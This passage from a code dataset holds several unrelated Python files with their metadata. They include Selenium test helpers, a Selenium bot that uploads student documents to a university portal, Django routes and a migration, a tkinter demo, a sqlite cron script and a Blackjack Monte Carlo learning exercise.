[]\r\n\t\tlist2 = []\r\n\t\tfor num in range(0,int(visiblerow)):\r\n\t\t\tpath = \"xpath=.//*[@id='ajs_T_AccountsTable_tAccounts_F_AccountsTable_tAccounts_cell_R\" + str(num) + \"C5']/div/span\"\r\n\t\t\tvalue = self.get_text(path);\r\n\t\t\t#time.strftime('%M %D %Y %H:%M:%S', time.strptime(value, '%M %D %Y %H:%m:%S %p'))\r\n\t\t\tdate_obj = datetime.strptime(value, \"%m/%d/%Y %I:%M %p\")\r\n\t\t\tbuiltInObj.log_to_console(date_obj)\r\n\t\t\tlist1.append(date_obj)\r\n\t\tlist2.extend(list1)\r\n\t\tlist2.sort()\r\n\t\tbuiltInObj.log_to_console(list1)\r\n\t\tbuiltInObj.log_to_console(\"******************************\")\r\n\t\tbuiltInObj.log_to_console(list2)\r\n\t\tif list1 == list2:\r\n\t\t\tbuiltInObj.log_to_console(\"EQUAL\")\r\n\t\telse:\r\n\t\t\tbuiltInObj.log_to_console(\"NOT EQUAL\")\r\n\r\n\tdef mouse_scroll(self, locator):\r\n\t\t\t\"\"\"Simulates pressing the left mouse button on the element specified by `locator` and dragging it by half of its own size.\r\n\r\n\t\t\tKey attributes for arbitrary elements are `id` and `name`. See\r\n\t\t\t`introduction` for details about locating elements.\r\n\t\t\t\"\"\"\r\n\t\t\tself = BuiltIn().get_library_instance('Selenium2Library')\r\n\t\t\t# self._info(\"**********************Simulating Mouse Up on element '%s'\" % locator)\r\n\t\t\t# self._warn(\"*********** '%s' *************\" % locator)\r\n\t\t\telement = self._element_find(locator, True, False)\r\n\t\t\tif element is None:\r\n\t\t\t\traise AssertionError(\"ERROR: Element %s not found.\" % (locator))\r\n\t\t\tsize = element.size\r\n\t\t\toffsetx = (size['width'] / 2) + 2\r\n\t\t\toffsety = (size['height'] / 2) + 2\r\n\t\t\t# the following is one long line indented the same as the above lines\r\n\t\t\tActionChains(self._current_browser()).move_to_element(element).click_and_hold(element).move_by_offset(offsetx,offsety).release(element).perform()\r\n\t\t # the above is one long line indented the same as the other lines\r\n\r\n\tdef get_tool_tip(self, locator):\r\n\t\tself = BuiltIn().get_library_instance('Selenium2Library')\r\n\t\tself._warn(\"LOCATOR: '%s' \" %locator)\r\n\r\n\tdef string_has_substring(self, mainstr, substr):\r\n\t\tself = BuiltIn().get_library_instance('Selenium2Library')\r\n\t\tif mainstr.find(substr) > -1:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False  # was a bare return, which yielded None instead of an explicit boolean\r\n\r\n\t@staticmethod\r\n\tdef date_key(a):\r\n\t\t\"\"\"\r\n\t\ta: date as string\r\n\t\t\"\"\"\r\n\t\t# 'datetime' is the class imported above, so call strptime on it directly\r\n\t\ta = datetime.strptime(a, '%d.%m.%Y').date()\r\n\t\treturn a\r\n","sub_path":"Library/Custom_09_14_2014.py","file_name":"Custom_09_14_2014.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"211274401","text":"from django.urls import path\nfrom . 
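`last_session_order` checks chronological order by parsing each `%m/%d/%Y %I:%M %p` string into a `datetime` before sorting — comparing the raw strings would order `12/...` ahead of `09/...`. The same idea as a one-line sort key (sample values are illustrative):

```python
from datetime import datetime

values = ["12/01/2014 9:05 AM", "09/14/2014 1:30 PM", "10/02/2014 7:45 AM"]
ordered = sorted(values, key=lambda s: datetime.strptime(s, "%m/%d/%Y %I:%M %p"))
```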
import views\n\nurlpatterns = [\n path('', views.post_list, name='post_list'),\n path('post//', views.post_detail, name='post_detail'),\n path('contact', views.contact, name='contact'),\n path('cart', views.cart, name='cart'),\n path('cart//',views.update_cart, name='update_cart'),\n]\n","sub_path":"store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"169144732","text":"from tkinter import*\r\nroot=Tk()\r\nroot.geometry('500x500')\r\nfr=Frame()\r\nfr.pack(pady=5)\r\ncanv=Canvas(root,width=500,height=500)\r\ncanv.pack()\r\ncanv.create_oval(30,30,200,200,fill='green')\r\n\r\nmainloop()\r\n","sub_path":"python1.py","file_name":"python1.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621795434","text":"# -*- coding: utf-8 -*-\nimport os\n# import sys\nimport time\nimport logging\nimport configparser\nfrom mapping import mapping\nfrom selenium import common\nfrom selenium import webdriver\n# from selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.remote.file_detector import UselessFileDetector\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nif not os.path.isdir('logs'):\n os.mkdir('logs')\n\ncount = len(os.listdir('logs'))\nlogging.basicConfig(level=logging.DEBUG, filename=f\"logs/logfile_{count}.txt\", filemode=\"a+\",\n format=\"%(asctime)-15s %(levelname)-8s %(message)s\")\n\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\n\nformatter = logging.Formatter('%(levelname)-8s %(message)s')\n\nconsole.setFormatter(formatter)\n\nlogging.getLogger('').addHandler(console)\nlog = logging.getLogger()\n\n\nclass Locators:\n try_iframe = '//*[@id=\"iframeResult\"]'\n try_button = '/html/body/button'\n\n login_asu = '//*[@id=\"users\"]'\n password_asu = '//*[@id=\"parole\"]'\n login_button_asu = '//*[@id=\"logButton\"]'\n\n search_field = '//*[@id=\"search\"]'\n student_name = '/html/body/table/tbody/tr[1]/td[1]/table/tbody/tr[2]/td/div/div/table/tbody/tr[2]/td[1]/div'\n student_open_button = '/html/body/table/tbody/tr[1]/td[1]/table/tbody/tr[2]/td/div/div/table/tbody/tr[2]'\n student_id = '/html/body/table/tbody/tr[1]/td[1]/table/tbody/tr[2]/td/div/div/table/tbody/tr[2]/td[2]'\n search_table_header = '/html/body/table/tbody/tr[1]/td[1]/table/tbody/tr[2]/td/div/div/table/tbody/tr[1]'\n search_button = '//*[@id=\"GO\"]'\n\n documents_button = '//*[@id=\"docum\"]'\n download_state_iframe = '/html/body/table/tbody/tr[1]/td[2]/div[2]/div/iframe'\n\n documents_table = '//*[@id=\"tableform\"]'\n documents_table_tr_tags = '//*[@id=\"tableform\"]/tbody/tr'\n\n\nclass Filler(object):\n\n def __init__(self):\n\n config = self.parse_settings()\n\n try:\n self.webdriver_location = config['Settings']['webdriver_location']\n self.asu_ste = config['Settings']['asu_ste']\n self.folder_with_sources = config['Settings']['folder_with_sources']\n self.login = config['Settings']['login']\n self.password = config['Settings']['password']\n self.wait_site = float(config['Settings']['wait'])\n\n self.debug = int(config['Debug']['Debug'])\n self.precautions = int(config['Debug']['precautions'])\n except KeyError:\n log.critical('Файл настроек не корректный!')\n exit(1)\n\n self.success_text = 'успешно загружен.'\n\n 
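The `<converter:name>` segments in this URLconf appear to have been stripped during extraction (`post//` and `cart//` are left with empty path segments). A hedged reconstruction of the conventional shape — the converter types and parameter names below are assumptions, not recovered from the source:

```python
# Hypothetical reconstruction; converter names are assumptions.
from django.urls import path
from . import views

urlpatterns = [
    path('', views.post_list, name='post_list'),
    path('post/<int:pk>/', views.post_detail, name='post_detail'),       # assumed <int:pk>
    path('contact', views.contact, name='contact'),
    path('cart', views.cart, name='cart'),
    path('cart/<int:item_id>/', views.update_cart, name='update_cart'),  # assumed parameter
]
```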
self.chrome_options = webdriver.ChromeOptions()\n # self.chrome_options.add_experimental_option(\"prefs\",\n # {'profile.managed_default_content_settings.javascript': 2})\n self.filler_driver = webdriver.Chrome(self.webdriver_location, options=self.chrome_options)\n self.filler_driver.file_detector = UselessFileDetector()\n self.wait = WebDriverWait(self.filler_driver, 60)\n\n if self.debug:\n log.info('Setting window size')\n # self.filler_driver.set_window_size(734, 936)\n self.filler_driver.set_window_position(-7, 0)\n log.info('Changing asu site')\n self.asu_ste = r'C:\\Users\\gromo\\Documents\\GitHub\\FileDownloader\\sources\\download.html'\n log.info(\"Setting fail state\")\n self.asu_ste_fail = r'C:\\gromo\\User\\Documents\\GitHub\\FileDownloader\\sources\\fail.html'\n\n log.info('Скрипт инициализирован успешно')\n\n @staticmethod\n def parse_settings():\n try:\n with open('config.ini', 'r', encoding='cp1252') as configfile:\n configfile.close()\n config = configparser.ConfigParser()\n config.read('config.ini')\n\n log.info('Настройки загружены')\n return config\n except FileNotFoundError:\n log.critical('Файл настроек не найден!')\n log.critical('Создайте и заполните config.ini согласно readme.md')\n exit(1)\n pass\n\n def get_current_student(self):\n log.info('Поиск студента в выдаче')\n try:\n found_name = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_name)),\n 'Ни одного студента не найдено!')\n except common.exceptions.TimeoutException:\n return ''\n log.info(f'Текущий студент : {found_name.text}', )\n return found_name.text\n\n def fill_new_id(self, stud_id):\n log.info('Ищем поле для загрузки')\n search_field = self.filler_driver.find_element_by_xpath(Locators.search_field)\n log.info('Очищаем его')\n search_field.clear()\n log.info(f'Вводим id нового студента : {stud_id}')\n search_field.send_keys(str(stud_id))\n # print('Введён id: ', search_field.get_attribute('value'))\n\n def open_student_card(self):\n log.info('Ждём пока можно кликнуть на столбик header')\n\n header_el = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.search_table_header)),\n \"Не получилось кликнуть в столбик!\")\n header_el.click()\n # input('Wait')\n\n log.info('Ждём элемент для открытия карточки студента')\n self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_open_button)),\n 'Не получилось найти элемент!')\n log.info('Ищем элемент')\n\n student_open = self.filler_driver.find_element_by_xpath(Locators.student_open_button)\n log.info('Нажимаем на студента')\n student_open.click()\n time.sleep(0.1)\n student_open.click()\n student_open.click()\n log.info('Студент должен быть открыт!')\n\n def click_search(self):\n log.info('Нажимаем в строку поиска')\n search_button = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.search_button)),\n 'Не получилось нажать в строку!')\n search_button.click()\n time.sleep(0.1)\n search_button.click()\n\n def click_documents_button(self):\n log.info('Ждем пока можно будет нажать на документы')\n self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.documents_button)))\n log.info('Нажимаем документы')\n self.filler_driver.find_element_by_xpath(Locators.documents_button).click()\n\n def get_state(self):\n log.info('Переключаемся в окно информации о загрузке')\n self.wait.until(EC.frame_to_be_available_and_switch_to_it((By.XPATH, Locators.documents_button)))\n time.sleep(1)\n log.info('Ищем текст')\n state = self.filler_driver.find_element_by_xpath('/html/body')\n log.info(f'Состояние : 
{state.text}')\n\n if self.success_text in state.text:\n\n state = True\n else:\n\n state = False\n\n log.info('Ждём 1 секунду')\n time.sleep(1)\n log.info('Возвращаемся к основной странице')\n self.filler_driver.switch_to.default_content()\n if self.precautions:\n input(\"Нажмите ENTER когда подтвердите корректность информации\")\n\n # print('Refreshing page')\n # self.filler_driver.refresh()\n\n self.open_student_card()\n\n # self.click_documents_button()\n\n if self.debug:\n log.info('ТК включен дебаг считаем что документ загрузился')\n return True\n return state\n\n def get_state_by_downloaded(self, label):\n log.info(\"Узнаём загружен ли документ\")\n log.info('Для этого переоткрываем студента')\n self.open_student_card()\n\n # self.click_documents_button()\n log.info('Получаем список загруженных документов')\n downloaded_documents = self.get_downloaded_documents()\n if label in downloaded_documents:\n log.info(\"Документ загружен!\")\n return True\n else:\n log.info(\"Документ не загружен!\")\n return False\n\n def get_all_folders(self):\n folders = os.listdir(self.folder_with_sources)\n return folders\n\n def send_document(self, label, document):\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site)\n rows = self.wait.until(EC.presence_of_all_elements_located((By.XPATH, Locators.documents_table_tr_tags)))\n\n log.info('Ищем куда загружать документ')\n for i in range(len(rows)):\n try:\n row_text = self.wait.until(\n EC.presence_of_element_located((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!').text\n except common.exceptions.StaleElementReferenceException:\n log.info('Строка не прикреплена к странице')\n log.debug(f'Ждём {self.wait_site * 2} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site * 2)\n row_text = self.wait.until(\n EC.presence_of_element_located((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!').text\n\n row = self.wait.until(\n EC.presence_of_element_located((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!')\n id_row = row.get_attribute('id')\n try:\n row = self.wait.until(\n EC.presence_of_element_located((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!')\n row.find_element_by_tag_name('a')\n continue\n except common.exceptions.NoSuchElementException:\n pass\n\n log.debug(f'Ждём {self.wait_site / 4} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site / 4)\n\n if label == row_text:\n\n log.info(id_row)\n file_path = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, f'//*[@id=\"{id_row}\"]/td/form/span/input')),\n 'Ошибка получения строки для загрузки!')\n # file_path = self.filler_driver.find_element_by_xpath(f'//*[@id=\"{id_row}\"]/td/form/span/input')\n log.info(f'Найдена соответсвующая строка: {label}')\n log.info(f'Загружаем документ : {document} ')\n if self.precautions:\n prec = input(\n 'Введите сюда любые символы и нажмите ENTER чтобы загрузить документ. 
\\n Просто нажмите ENTER '\n 'чтобы пропустить загрузку')\n if prec != '':\n log.info('Загружаем!!')\n file_path = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, f'//*[@id=\"{id_row}\"]/td/form/span/input')),\n 'Ошибка получения строки для загрузки!')\n file_path.send_keys(str(document))\n # file_path.click()\n time.sleep(1)\n log.info('Документ отправлен!')\n if self.get_state_by_downloaded(label):\n return True\n else:\n return False\n else:\n log.info('ПРОПУСКАЕМ ЗАГРУЗКУ!')\n return True\n else:\n log.info('Загружаем!!')\n file_path.send_keys(str(document))\n # file_path.click()\n time.sleep(1)\n if self.get_state_by_downloaded(label):\n return True\n else:\n return False\n log.error('Строка не найдена!')\n return True\n\n def get_downloaded_documents(self):\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site)\n log.info('Ждём пока появится список документов')\n self.wait.until(EC.presence_of_element_located((By.XPATH, Locators.documents_table)))\n log.info('Ждём пока можно с ним взаимодействовать')\n self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.documents_table)))\n\n log.info('Ищем документы которые уже загружены')\n\n log.info('Ждём пока строки присутсвтуют')\n rows = self.wait.until(EC.presence_of_all_elements_located((By.XPATH, Locators.documents_table_tr_tags)),\n 'Не получилось найти строки!')\n\n downloaded_documents = []\n for i in range(len(rows)):\n time.sleep(self.wait_site / 4)\n try:\n doc_text = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!').text\n except common.exceptions.StaleElementReferenceException:\n log.info('Строка не прикреплена к странице')\n log.debug(f'Ждём {self.wait_site * 2} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site * 2)\n doc_text = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!').text\n\n # doc_text = row.text\n if doc_text == '':\n break\n # print(i.text)\n downloaded_documents.append(doc_text)\n log.info('Возвращаем список')\n return downloaded_documents\n\n def change_student(self, new_id):\n for i in range(1, 100):\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site)\n if i > 99:\n exit(f\"Не получилось найти студента {new_id}\")\n self.fill_new_id(str(new_id))\n time.sleep(0.1)\n self.click_search()\n\n log.info('Получаем id студента из выдачи')\n try:\n result_id = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_id)),\n 'Не удалось получить id!')\n text = result_id.text\n except common.exceptions.StaleElementReferenceException:\n log.info('Строка не прикреплена к странице')\n log.debug(f'Ждём {self.wait_site * 2} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site * 2)\n result_id = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_id)),\n 'Не удалось получить id!')\n text = result_id.text\n\n log.info(f'Id который мы нашли : {text}')\n if self.debug:\n log.info('Считаем что он ввёлся, тк включен дебаг')\n break\n if str(new_id) not in str(text):\n log.error(\"Студент не изменился, поиск не сработал!\")\n time.sleep(1)\n continue\n else:\n log.info('Студент по id найден!')\n try:\n result_id = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_id)),\n 'Не удалось получить id!')\n result_id.click()\n except 
common.exceptions.StaleElementReferenceException:\n log.info('Строка не прикреплена к странице')\n log.debug(f'Ждём {self.wait_site * 2} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site * 2)\n result_id = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_id)),\n 'Не удалось получить id!')\n result_id.click()\n\n log.info('Ждём пока откроется карточка')\n self.wait.until(EC.presence_of_element_located((By.XPATH, Locators.documents_table)))\n break\n\n @staticmethod\n def return_site_naming(document):\n for site_naming, file_naming in mapping.items():\n if type(file_naming) == str:\n if file_naming.lower().replace(' ', '') == document.lower().replace(' ', ''):\n return site_naming\n else:\n for value in file_naming:\n if value.lower().replace(' ', '') == document.lower().replace(' ', ''):\n return site_naming\n\n def check_pasp_and_reg(self, folder):\n documents = os.listdir(self.folder_with_sources + r'\\/' + folder)\n for file in documents:\n if file.lower().replace(' ', '') == \"пасп и рег.pdf\".lower().replace(' ', ''):\n log.info('Фай \"пасп и рег.pdf\" найден!')\n log.info('Загружаем в Паспорт (стр. 2-3 - с фото) и \"Регистрация по месту пребывания')\n downloaded_documents = self.get_downloaded_documents()\n file_naming = self.folder_with_sources + r'/' + folder + r'/' + documents[documents.index(file)]\n if 'Паспорт (стр. 2-3 - с фото)' not in downloaded_documents:\n self.send_checker('Паспорт (стр. 2-3 - с фото)', file_naming)\n downloaded_documents = self.get_downloaded_documents()\n file_naming = self.folder_with_sources + r'/' + folder + r'/' + documents[documents.index(file)]\n if 'Регистрация по месту пребывания' not in downloaded_documents:\n self.send_checker('Регистрация по месту пребывания', file_naming)\n\n def send_checker(self, site_naming, file_naming):\n if self.send_document(site_naming, file_naming):\n log.info('Документ загружен успешно')\n return True\n else:\n log.error('Заходим в бесконечный цикл попытки загрузки файла!')\n while True:\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site)\n if self.send_document(site_naming, file_naming):\n log.info('Документ загружен успешно')\n return True\n else:\n log.error('Загрузка не удалась')\n log.info('Пытаемся снова')\n time.sleep(1)\n\n def download_unfinished_docs(self, folder):\n documents = os.listdir(self.folder_with_sources + r'\\/' + folder)\n log.info(f'Все документы в папке : {documents}')\n\n for file in documents:\n\n log.info(f'Работаем с файлом : \"{file}\" ')\n file_naming = self.folder_with_sources + r'/' + folder + r'/' + documents[documents.index(file)]\n site_naming = self.return_site_naming(file)\n if site_naming is None:\n log.info('Файл не обозначен!')\n log.info('Записываем его путь и название в UNFINISHED_DOCS.TXT')\n with open('UNFINISHED_DOCS.txt', 'a+', encoding='cp1251') as file_to_write:\n file_to_write.writelines(self.folder_with_sources + r'/' + folder + r'/' + '\\n')\n file_to_write.writelines(documents[documents.index(file)] + '\\n')\n file_to_write.writelines('\\n')\n continue\n\n log.info(f'Документ называется : {file_naming}')\n log.info(f'Соответсвующая ему строка на сайте : {site_naming} ')\n\n downloaded_documents = self.get_downloaded_documents()\n\n if site_naming in downloaded_documents:\n log.error('Документ уже был загружен!')\n continue\n\n log.info('Приступаем к загрузке')\n self.send_checker(site_naming, file_naming)\n\n def iterate_through_folders(self):\n folders = 
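`send_checker` above retries a failed upload in an explicit `while True` loop, and the same sleep-and-retry shape is repeated inline around several stale-element lookups. The pattern can be factored into one helper; a generic sketch, not lifted from the script (the lookup in the usage comment is illustrative):

```python
import time

def retry(fn, attempts=3, delay=1.0, exceptions=(Exception,)):
    """Call fn(); on one of the given exceptions, sleep and retry, re-raising on the last attempt."""
    for attempt in range(1, attempts + 1):
        try:
            return fn()
        except exceptions:
            if attempt == attempts:
                raise
            time.sleep(delay)

# e.g. retry(lambda: driver.find_element_by_xpath(xpath).click(),
#            exceptions=(StaleElementReferenceException,))
```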
self.get_all_folders()\n for folder in folders:\n current_folder = self.folder_with_sources + r'\\/' + folder\n documents = os.listdir(current_folder)\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n log.info('---------------------')\n log.info(f'Работаем с папкой: {folder}')\n if 'finished' in documents:\n log.info('Cтудент уже внесён')\n continue\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n\n time.sleep(self.wait_site)\n self.change_student(folder)\n log.info('Приступаем к загрузке документов')\n self.download_unfinished_docs(folder)\n log.info('Проверяем наличие \"файла пасп и рег\"')\n self.check_pasp_and_reg(folder)\n log.info('Создаём файл finished')\n self.create_finished_folder(current_folder)\n\n @staticmethod\n def create_finished_folder(current_folder):\n file = current_folder + '/finished'\n with open(file, 'a'):\n os.utime(file, None)\n\n def test_alert(self):\n self.filler_driver.get('https://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_alert')\n log.info('Waiting for iframe')\n self.wait.until(EC.frame_to_be_available_and_switch_to_it((By.XPATH, Locators.try_iframe)))\n log.info('Waiting for try butt')\n test_al = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.try_button)))\n test_al.click()\n while True:\n log.info('waiting alert')\n alert = self.wait.until((EC.alert_is_present()), 'Alert Was not present!!!!')\n log.info('accepting')\n alert.accept()\n\n def start_browser(self):\n if not self.debug:\n self.filler_driver.get('https://asu.itut.ru/bonch/?login=no')\n\n # log.info('Ждём ошибки сертификата')\n # alert = self.wait.until(EC.alert_is_present())\n # log.info('Принимаем')\n # alert.accept()\n\n log.info('Ищем поле логин')\n login = self.filler_driver.find_element_by_xpath(Locators.login_asu)\n time.sleep(0.1)\n log.info('Вводим логин')\n login.send_keys(self.login)\n\n log.info('Ищем поле пароль')\n password = self.filler_driver.find_element_by_xpath(Locators.password_asu)\n time.sleep(0.1)\n log.info('Вводим пароль')\n password.send_keys(self.password)\n\n time.sleep(1)\n\n log.info('Ищем кнопку войти')\n login_button = self.filler_driver.find_element_by_xpath(Locators.login_button_asu)\n log.info('Кликаем')\n login_button.click()\n time.sleep(1)\n\n log.info('Переходим на сайт АСУ')\n self.filler_driver.get(self.asu_ste)\n\n time.sleep(0.1)\n\n self.click_documents_button()\n time.sleep(0.1)\n\n # input('Нажмите ENTER если программа находится на нужной странице')\n\n log.info('Начинаем цикл по папкам')\n try:\n self.iterate_through_folders()\n except Exception as e:\n self.filler_driver.quit()\n raise Exception(e)\n\n\nif __name__ == \"__main__\":\n while True:\n try:\n main_method = Filler()\n main_method.start_browser()\n log.info('Программа закончила! Нажмите ENTER для повторного прохода')\n input()\n continue\n except Exception as e:\n log.exception(e)\n log.error('ОШИБКА! 
Начинаем повторно')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535283369","text":"import sqlite3\nimport cron\n\nconnection = sqlite3.connect(\"/home/pi/Zeiterfassung/Datenbanken/Arbeiter.db\")\nc = connection.cursor()\nc.execute(\"SELECT * FROM Arbeiter\")\nresult = c.fetchall()\nfor r in result:\n dname = r[0]\n print(dname)\n cron.addMonth(dname)","sub_path":"Cron/monthly.py","file_name":"monthly.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"320888963","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='urlExpander',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('DestinationUrl', models.URLField()),\n ('shortUrl', models.URLField()),\n ('httpStatusCode', models.IntegerField()),\n ('pageTitle', models.CharField(max_length=100)),\n ],\n ),\n ]\n","sub_path":"urlexpander/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"287634800","text":"import gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nenv = gym.make('Blackjack-v0')\nS = [(sum_hand, dealer_card, usable_ace) for sum_hand in range(12,22) for dealer_card in range(1,11) for usable_ace in [True, False]]\n\ndef monte_carlo_prediction():\n V = {s: 0 for s in S}\n Returns = {s: [] for s in S}\n\n for i in range(500000):\n obs = env.reset() # obs is a tuple: (player_sum, dealer_card, useable_ace)\n done = False\n total_reward = 0\n observed_states = {}\n while not done:\n if obs[0] >= 12 and obs[0] <= 21 and obs not in observed_states:\n # save state and reward up until now\n observed_states[obs] = total_reward\n if obs[0] >= 20:\n #print(\"stick\")\n obs, reward, done, _ = env.step(0)\n else:\n #print(\"hit\")\n obs, reward, done, _ = env.step(1)\n #print(\"reward:\", reward)\n total_reward += reward\n for s in observed_states:\n G = total_reward - observed_states[s]\n Returns[s].append(G) \n V[s] = np.mean(Returns[s])\n \n X, Y = np.meshgrid(np.arange(12,22),np.arange(1,11))\n Z = np.array([V[(X[x][y], Y[x][y], False)] for x in range(X.shape[0]) for y in range(X.shape[1])])\n Z = Z.reshape(X.shape)\n fig = plt.figure(figsize=(13, 5), dpi=80)\n ax = fig.add_subplot(121, projection='3d')\n ax.plot_surface(X, Y, Z, color=\"w\", edgecolor=\"k\")\n ax.view_init(40, 210)\n ax.set_xlabel('Player sum')\n ax.set_ylabel('Dealer showing')\n ax.set_zlabel('V')\n ax.set_title('No usable ace')\n ax.dist = 13\n\n Z = np.array([V[(X[x][y], Y[x][y], True)] for x in range(X.shape[0]) for y in range(X.shape[1])])\n Z = Z.reshape(X.shape)\n ax = fig.add_subplot(122, projection='3d')\n ax.plot_surface(X, Y, Z, color=\"w\", edgecolor=\"k\")\n ax.view_init(40, 210)\n ax.set_xlabel('Player sum')\n ax.set_ylabel('Dealer showing')\n ax.set_zlabel('V')\n ax.set_title('Usable ace')\n ax.dist = 13\n plt.savefig(\"ex04-mc-prediction.pdf\")\n plt.show()\n\n\ndef monte_carlo_es():\n Q = {(s,a): 0 for s in S for a in [0,1]}\n pi = {s: 0 for s in S}\n Returns = {(s,a): [] for s in S for a in [0,1]}\n num_iter = 
0\n while True:\n for i in range(100000):\n S0 = S[np.random.choice(len(S))]\n A0 = np.random.choice([0,1])\n #print(\"S0:\", S0)\n obs = env.reset() # obs is a tuple: (player_sum, dealer_card, useable_ace)\n set_state(env, S0)\n obs = env._get_obs()\n #print(\"observation:\", obs)\n next_action = A0\n done = False\n total_reward = 0\n observed_states = {}\n while not done:\n if obs[0] >= 12 and obs[0] <= 21 and (obs,next_action) not in observed_states:\n # save state and reward up until now\n observed_states[(obs, next_action)] = total_reward\n obs, reward, done, _ = env.step(next_action)\n \n if obs[0] < 12 or obs[0] > 21:\n next_action = 1\n else:\n next_action = pi[obs]\n total_reward += reward\n\n\n for (s, a) in observed_states:\n G = total_reward - observed_states[(s,a)]\n Returns[(s,a)].append(G) \n Q[(s,a)] = np.mean(Returns[(s,a)])\n pi[s] = np.argmax([Q[(s,0)], Q[(s,1)]])\n num_iter += 1\n \n print(f'{num_iter} iterations')\n print('No usable ace')\n print('=============')\n print(' A23456789B')\n print(' #-------------> dealer showing')\n for sum_hand in range(12,22):\n print(f\"{sum_hand} | \", end='')\n for dealer_card in range(1,11):\n print(pi[(sum_hand,dealer_card,False)], end='')\n print()\n print(\" \\\\/\")\n print(\"player sum\")\n print()\n print('usable ace')\n print('==========')\n print(' A23456789B')\n print(' #-------------> dealer showing')\n for sum_hand in range(12,22):\n print(f\"{sum_hand} | \", end='')\n for dealer_card in range(1,11):\n print(pi[(sum_hand,dealer_card,True)], end='')\n print()\n print(\" \\\\/\")\n print(\"player sum\")\n print()\n\ndef set_state(env, s):\n player_hand = []\n if s[2]:\n while (sum(player_hand) + 11) < s[0]:\n player_hand.append(min(s[0] - (sum(player_hand) + 11), 10))\n player_hand.append(1)\n else:\n while sum(player_hand) < s[0]:\n player_hand.append(min(s[0] - sum(player_hand), 10))\n \n env.player = player_hand\n env.dealer[0] = s[1]\n\n\ndef example_main():\n # This example shows how to perform a single run with the policy that hits for player_sum >= 20\n env = gym.make('Blackjack-v0')\n obs = env.reset() # obs is a tuple: (player_sum, dealer_card, useable_ace)\n done = False\n while not done:\n print(\"observation:\", obs)\n if obs[0] >= 20:\n print(\"stick\")\n obs, reward, done, _ = env.step(0)\n else:\n print(\"hit\")\n obs, reward, done, _ = env.step(1)\n print(\"reward:\", reward)\n print(\"\")\n\n\ndef main():\n #monte_carlo_prediction()\n monte_carlo_es()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ex04-mc/ex04-mc.py","file_name":"ex04-mc.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"132127486","text":"def main():\n \"\"\"Team House of Cards\n A modification of the Pick and Place example which uses the\n Rethink Inverse Kinematics Service which returns the joint angles for a\n requested Cartesian Pose. 
